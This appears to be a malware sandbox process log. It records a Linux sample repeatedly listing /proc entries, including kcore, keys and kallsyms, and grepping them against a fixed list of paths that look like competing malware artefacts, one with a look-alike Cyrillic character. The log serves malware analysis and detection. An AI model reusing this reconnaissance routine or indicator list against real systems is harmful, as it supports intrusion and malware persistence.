/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1233
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1235
-
-
/bin/grepgrep exe2⤵PID:1236
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1238
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1240
-
-
/bin/grepgrep exe2⤵PID:1241
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1243
-
-
/bin/grepgrep exe2⤵PID:1246
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1245
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1248
-
-
/bin/grepgrep exe2⤵PID:1251
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1250
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1253
-
-
/bin/grepgrep exe2⤵PID:1256
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1255
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1258
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1261
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1263
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1265
-
-
/bin/grepgrep exe2⤵PID:1266
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1268
-
-
/bin/grepgrep exe2⤵PID:1271
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1270
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1273
-
-
/bin/grepgrep exe2⤵PID:1276
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1275
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1278
-
-
/bin/grepgrep exe2⤵PID:1281
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1280
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1283
-
-
/bin/grepgrep exe2⤵PID:1286
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1285
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1288
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1290
-
-
/bin/grepgrep exe2⤵PID:1291
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1294
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1297
-
-
/bin/grepgrep exe2⤵PID:1298
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1300
-
-
/bin/grepgrep exe2⤵PID:1304
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1303
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1307
-
-
/bin/grepgrep exe2⤵PID:1310
-
-
/bin/lsls -latrh /proc/net2⤵PID:1309
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1313
-
-
/bin/grepgrep exe2⤵PID:1317
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵
- Reads runtime system information
PID:1316
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1320
-
-
/bin/grepgrep exe2⤵PID:1324
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1323
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1326
-
-
/bin/grepgrep exe2⤵PID:1330
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1329
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1333
-
-
/bin/grepgrep exe2⤵PID:1336
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1335
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1339
-
-
/bin/grepgrep exe2⤵PID:1343
-
-
/bin/lsls -latrh /proc/self2⤵PID:1342
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1345
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1348
-
-
/bin/grepgrep exe2⤵PID:1349
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1352
-
-
/bin/grepgrep exe2⤵PID:1355
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1354
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1358
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1361
-
-
/bin/grepgrep exe2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1364
-
-
/bin/grepgrep exe2⤵PID:1369
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1368
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1371
-
-
/bin/grepgrep exe2⤵PID:1375
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1374
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1378
-
-
/bin/grepgrep exe2⤵PID:1381
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1380
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1384
-
-
/bin/grepgrep exe2⤵PID:1388
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1390
-
-
/bin/grepgrep exe2⤵PID:1394
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1393
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1397
-
-
/bin/grepgrep exe2⤵PID:1400
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1399
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1404
-
-
/bin/grepgrep exe2⤵PID:1407
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1406
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1410
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1413
-
-
/bin/grepgrep exe2⤵PID:1414
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1416
-
-
/bin/lsls -latrh /proc/version2⤵PID:1419
-
-
/bin/grepgrep exe2⤵PID:1420
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1423
-
-
/bin/grepgrep exe2⤵PID:1426
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1425
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1428
-
-
/bin/grepgrep exe2⤵PID:1431
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1430
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1433
-
-
/bin/grepgrep exe2⤵PID:1436
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1435
-
-
